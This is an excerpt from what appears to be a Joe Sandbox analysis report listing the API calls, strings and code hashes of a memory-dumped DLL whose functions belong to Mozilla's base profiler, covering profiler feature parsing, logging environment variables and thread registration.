                                                                  • API String ID:
                                                                  • Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                  • Instruction ID: a11073a2668969234bf08c647018f4b2d7a1be98d634747b4643a0473230b3e5
                                                                  • Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                  • Instruction Fuzzy Hash: 63A1CF71F0021A8BDB18CE69C9907AEB7F2EFC9354F188529D915E7782CB349C068B90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentTerminate
                                                                  • String ID:
                                                                  • API String ID: 2429186680-0
                                                                  • Opcode ID: 37cdb5676e078ea8daac94dc43fd9f86d3dce64e2ff4bc4b614a203e3bf5976b
                                                                  • Instruction ID: fc52f39fb64eb5a8af364b98af2f7e3b323563dc3bdd90dc7f210cedccf02131
                                                                  • Opcode Fuzzy Hash: 37cdb5676e078ea8daac94dc43fd9f86d3dce64e2ff4bc4b614a203e3bf5976b
                                                                  • Instruction Fuzzy Hash: 1B716D75E012198FCF18CFA8D8905EDBBB6FF89324F24816ED916AB740D731A905CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentTerminate
                                                                  • String ID:
                                                                  • API String ID: 2429186680-0
                                                                  • Opcode ID: 04b622d6229cce497a178269651c4960e70e06000e0715da1b53176b8351d7af
                                                                  • Instruction ID: d91610563ee156b530c173ae9b533ad59d5c0ae5aba763be55a2946feb59791a
                                                                  • Opcode Fuzzy Hash: 04b622d6229cce497a178269651c4960e70e06000e0715da1b53176b8351d7af
                                                                  • Instruction Fuzzy Hash: 6F818C75A012199FCB04CFA8D8809EEBBF6FF89318F64826DD411AB741D731E945CBA4
                                                                  APIs
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C8D582D), ref: 6C90CC27
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C8D582D), ref: 6C90CC3D
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C93FE98,?,?,?,?,?,6C8D582D), ref: 6C90CC56
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C8D582D), ref: 6C90CC6C
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C8D582D), ref: 6C90CC82
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C8D582D), ref: 6C90CC98
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8D582D), ref: 6C90CCAE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C90CCC4
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C90CCDA
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C90CCEC
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C90CCFE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C90CD14
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C90CD82
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C90CD98
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C90CDAE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C90CDC4
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C90CDDA
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C90CDF0
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C90CE06
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C90CE1C
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C90CE32
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C90CE48
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C90CE5E
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C90CE74
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C90CE8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: strcmp
                                                                  • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                  • API String ID: 1004003707-2809817890
                                                                  • Opcode ID: 132ece34d0ced4fa7758c4ac99ed8b94695dc9ddde207a7df5ed2168c5fc7dac
                                                                  • Instruction ID: 8b9616c95a4f0d60e9095b157b26f2e2e8788e2de1fda652b199244eeb80adf8
                                                                  • Opcode Fuzzy Hash: 132ece34d0ced4fa7758c4ac99ed8b94695dc9ddde207a7df5ed2168c5fc7dac
                                                                  • Instruction Fuzzy Hash: A25184C2B4563662FB0031156D10BAA144DEFB324AF10653EEE0EA5E80FF05E619C6B7
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C8D4801
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8D4817
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8D482D
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D484A
                                                                    • Part of subcall function 6C8FAB3F: EnterCriticalSection.KERNEL32(6C94E370,?,?,6C8C3527,6C94F6CC,?,?,?,?,?,?,?,?,6C8C3284), ref: 6C8FAB49
                                                                    • Part of subcall function 6C8FAB3F: LeaveCriticalSection.KERNEL32(6C94E370,?,6C8C3527,6C94F6CC,?,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8FAB7C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8D485F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8D487E
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C8D488B
                                                                  • free.MOZGLUE(?), ref: 6C8D493A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8D4956
                                                                  • free.MOZGLUE(00000000), ref: 6C8D4960
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C8D499A
                                                                    • Part of subcall function 6C8FAB89: EnterCriticalSection.KERNEL32(6C94E370,?,?,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284), ref: 6C8FAB94
                                                                    • Part of subcall function 6C8FAB89: LeaveCriticalSection.KERNEL32(6C94E370,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8FABD1
                                                                  • free.MOZGLUE(?), ref: 6C8D49C6
                                                                  • free.MOZGLUE(?), ref: 6C8D49E9
                                                                    • Part of subcall function 6C8E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8E5EDB
                                                                    • Part of subcall function 6C8E5E90: memset.VCRUNTIME140(6C927765,000000E5,55CCCCCC), ref: 6C8E5F27
                                                                    • Part of subcall function 6C8E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8E5FB2
                                                                  Strings
                                                                  • [I %d/%d] profiler_shutdown, xrefs: 6C8D4A06
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C8D4812
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C8D4828
                                                                  • MOZ_PROFILER_SHUTDOWN, xrefs: 6C8D4A42
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C8D47FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                  • API String ID: 1340022502-4194431170
                                                                  • Opcode ID: 3f7afe8b42c9808925a00d239ba94253d64f798d5d2d01dac134fa60f7ce58dd
                                                                  • Instruction ID: 06d80cef5dc8fa0dbe0a8b49aaee851bc8253625cbc959b9956522fa92abf0eb
                                                                  • Opcode Fuzzy Hash: 3f7afe8b42c9808925a00d239ba94253d64f798d5d2d01dac134fa60f7ce58dd
                                                                  • Instruction Fuzzy Hash: 98812471A041019FDB20EF68CA8875A3771AFC232CF264A79D91697F41EB31F854CB96
                                                                  APIs
                                                                    • Part of subcall function 6C8D4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C8D44B2,6C94E21C,6C94F7F8), ref: 6C8D473E
                                                                    • Part of subcall function 6C8D4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C8D474A
                                                                  • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C8D44BA
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C8D44D2
                                                                  • InitOnceExecuteOnce.KERNEL32(6C94F80C,6C8CF240,?,?), ref: 6C8D451A
                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C8D455C
                                                                  • LoadLibraryW.KERNEL32(?), ref: 6C8D4592
                                                                  • InitializeCriticalSection.KERNEL32(6C94F770), ref: 6C8D45A2
                                                                  • moz_xmalloc.MOZGLUE(00000008), ref: 6C8D45AA
                                                                  • moz_xmalloc.MOZGLUE(00000018), ref: 6C8D45BB
                                                                  • InitOnceExecuteOnce.KERNEL32(6C94F818,6C8CF240,?,?), ref: 6C8D4612
                                                                  • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C8D4636
                                                                  • LoadLibraryW.KERNEL32(user32.dll), ref: 6C8D4644
                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C8D466D
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D469F
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D46AB
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D46B2
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D46B9
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D46C0
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8D46CD
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C8D46F1
                                                                  • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C8D46FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                  • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                  • API String ID: 1702738223-3894940629
                                                                  • Opcode ID: 60a2efe012cf827b6271b9a40934a663784984f60b3d65f9505daf9bf3ef3321
                                                                  • Instruction ID: e19e423fc249a1af2fcfd977d53fdd29de81188b3682429796044fe826c9ad5a
                                                                  • Opcode Fuzzy Hash: 60a2efe012cf827b6271b9a40934a663784984f60b3d65f9505daf9bf3ef3321
                                                                  • Instruction Fuzzy Hash: DB6139B06083489FEB20AF60CD09B9A7BB8EBC270CF25C998E5059B641D774E944CF91
                                                                  APIs
                                                                    • Part of subcall function 6C907090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C90B9F1,?), ref: 6C907107
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C90DCF5), ref: 6C90E92D
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EA4F
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90EA5C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90EA80
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EA8A
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C90DCF5), ref: 6C90EA92
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EB11
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90EB1E
                                                                  • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C90EB3C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90EB5B
                                                                    • Part of subcall function 6C905710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C90EB71), ref: 6C9057AB
                                                                    • Part of subcall function 6C8FCBE8: GetCurrentProcess.KERNEL32(?,6C8C31A7), ref: 6C8FCBF1
                                                                    • Part of subcall function 6C8FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8C31A7), ref: 6C8FCBFA
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                    • Part of subcall function 6C909420: __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EBA4
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C90EBAC
                                                                    • Part of subcall function 6C9094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9094EE
                                                                    • Part of subcall function 6C9094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C909508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EBC1
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8,?,?,00000000), ref: 6C90EBCE
                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C90EBE5
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8,00000000), ref: 6C90EC37
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C90EC46
                                                                  • CloseHandle.KERNEL32(?), ref: 6C90EC55
                                                                  • free.MOZGLUE(00000000), ref: 6C90EC5C
                                                                  Strings
                                                                  • [I %d/%d] profiler_start, xrefs: 6C90EBB4
                                                                  • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C90EA9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                  • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                  • API String ID: 1341148965-1186885292
                                                                  • Opcode ID: f2d8bee75baf77c8f3b638afd6ed2e38d706a1690bf9efe38f80c6fd22e18a10
                                                                  • Instruction ID: 9e46da5de0031b167963d535d9832fd5a48e67d4d8dd849f18074c8fc084a449
                                                                  • Opcode Fuzzy Hash: f2d8bee75baf77c8f3b638afd6ed2e38d706a1690bf9efe38f80c6fd22e18a10
                                                                  • Instruction Fuzzy Hash: 9DA134717086059FDB10AF28C848BAA77B9FFD631CF24852DE96987B41DB70D805CBA1
                                                                  APIs
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                    • Part of subcall function 6C909420: __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F70E
                                                                  • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C90F8F9
                                                                    • Part of subcall function 6C8D6390: GetCurrentThreadId.KERNEL32 ref: 6C8D63D0
                                                                    • Part of subcall function 6C8D6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C8D63DF
                                                                    • Part of subcall function 6C8D6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C8D640E
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90F93A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F98A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F990
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C90F994
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C90F716
                                                                    • Part of subcall function 6C9094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9094EE
                                                                    • Part of subcall function 6C9094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C909508
                                                                    • Part of subcall function 6C8CB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C8CB5E0
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F739
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90F746
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90F793
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C94385B,00000002,?,?,?,?,?), ref: 6C90F829
                                                                  • free.MOZGLUE(?,?,00000000,?), ref: 6C90F84C
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C90F866
                                                                  • free.MOZGLUE(?), ref: 6C90FA0C
                                                                    • Part of subcall function 6C8D5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8D55E1), ref: 6C8D5E8C
                                                                    • Part of subcall function 6C8D5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8D5E9D
                                                                    • Part of subcall function 6C8D5E60: GetCurrentThreadId.KERNEL32 ref: 6C8D5EAB
                                                                    • Part of subcall function 6C8D5E60: GetCurrentThreadId.KERNEL32 ref: 6C8D5EB8
                                                                    • Part of subcall function 6C8D5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8D5ECF
                                                                    • Part of subcall function 6C8D5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C8D5F27
                                                                    • Part of subcall function 6C8D5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C8D5F47
                                                                    • Part of subcall function 6C8D5E60: GetCurrentProcess.KERNEL32 ref: 6C8D5F53
                                                                    • Part of subcall function 6C8D5E60: GetCurrentThread.KERNEL32 ref: 6C8D5F5C
                                                                    • Part of subcall function 6C8D5E60: GetCurrentProcess.KERNEL32 ref: 6C8D5F66
                                                                    • Part of subcall function 6C8D5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C8D5F7E
                                                                  • free.MOZGLUE(?), ref: 6C90F9C5
                                                                  • free.MOZGLUE(?), ref: 6C90F9DA
                                                                  Strings
                                                                  • [D %d/%d] profiler_register_thread(%s), xrefs: 6C90F71F
                                                                  • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C90F9A6
                                                                  • " attempted to re-register as ", xrefs: 6C90F858
                                                                  • Thread , xrefs: 6C90F789
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                  • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                  • API String ID: 882766088-1834255612
                                                                  • Opcode ID: 6a16f51739b21954f6f551afb904be655ac563234738ed92ba2e6709da1ff3c3
                                                                  • Instruction ID: 297d97caf4c522e54b440c48c33a986e9572303cfa31a2c0ecac1b4dde37b06b
                                                                  • Opcode Fuzzy Hash: 6a16f51739b21954f6f551afb904be655ac563234738ed92ba2e6709da1ff3c3
                                                                  • Instruction Fuzzy Hash: 118103716047019FDB10DF28C440AAAB7B5FFC530CF51896DE8598BB51EB30D949CB92
                                                                  APIs
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                    • Part of subcall function 6C909420: __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EE60
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90EE6D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90EE92
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C90EEA5
                                                                  • CloseHandle.KERNEL32(?), ref: 6C90EEB4
                                                                  • free.MOZGLUE(00000000), ref: 6C90EEBB
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EEC7
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C90EECF
                                                                    • Part of subcall function 6C90DE60: GetCurrentThreadId.KERNEL32 ref: 6C90DE73
                                                                    • Part of subcall function 6C90DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C8D4A68), ref: 6C90DE7B
